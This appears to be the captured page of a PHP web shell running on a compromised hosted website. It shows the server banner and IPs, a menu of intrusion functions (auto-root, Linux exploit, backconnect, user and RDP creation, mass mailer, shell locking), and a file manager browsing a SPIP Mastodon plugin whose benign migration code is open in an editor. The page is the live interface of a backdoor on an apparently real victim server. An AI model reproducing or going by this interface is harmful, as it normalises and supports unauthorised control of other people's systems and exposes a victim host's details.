Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
www /
plugins /
auto /
mastodon /
v2.0.1 /
[ HOME SHELL ]
Name
Size
Permission
Action
action
[ DIR ]
drwx---r-x
feed
[ DIR ]
drwx---r-x
formulaires
[ DIR ]
drwx---r-x
genie
[ DIR ]
drwx---r-x
inc
[ DIR ]
drwx---r-x
lang
[ DIR ]
drwx---r-x
lib
[ DIR ]
drwx---r-x
modeles
[ DIR ]
drwx---r-x
prive
[ DIR ]
drwx---r-x
syndic
[ DIR ]
drwx---r-x
install.log
148
B
-rw----r--
mastodon-backend.html
448
B
-rw----r--
mastodon_administrations.php
1.18
KB
-rw----r--
mastodon_fonctions.php
3.61
KB
-rw----r--
paquet.xml
1.11
KB
-rw----r--
readme.md
342
B
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mastodon_administrations.php
<?php /* * Plugin spip|mastodon * (c) 2009-2013 * * envoyer et lire des messages de Mastodon * distribue sous licence GNU/LGPL * */ if (!defined("_ECRIRE_INC_VERSION")) return; /** * Table principale * un champ microblog sur les articles * * @param array $tables * @return array */ function mastodon_declarer_tables_objets_sql($tables) { $tables['spip_articles']['field']['pouet'] = "VARCHAR(500) DEFAULT '' NOT NULL"; return $tables; } /** * maj dede la table article * * @param string $nom_meta_base_version * @param string $version_cible */ function mastodon_upgrade($nom_meta_base_version,$version_cible){ $maj = array(); $maj['create'] = array( array('sql_alter',"TABLE spip_articles ADD pouet VARCHAR(500) DEFAULT '' NOT NULL"), ); $maj['1.0.0'] = array( array('sql_alter',"TABLE spip_articles ADD pouet VARCHAR(500) DEFAULT '' NOT NULL"), ); include_spip('base/upgrade'); maj_plugin($nom_meta_base_version, $version_cible, $maj); } /** * Desinstallation/suppression * * @param string $nom_meta_base_version */ function mastodon_vider_tables($nom_meta_base_version) { sql_alter("table spip_articles DROP pouet"); effacer_meta($nom_meta_base_version); }
Close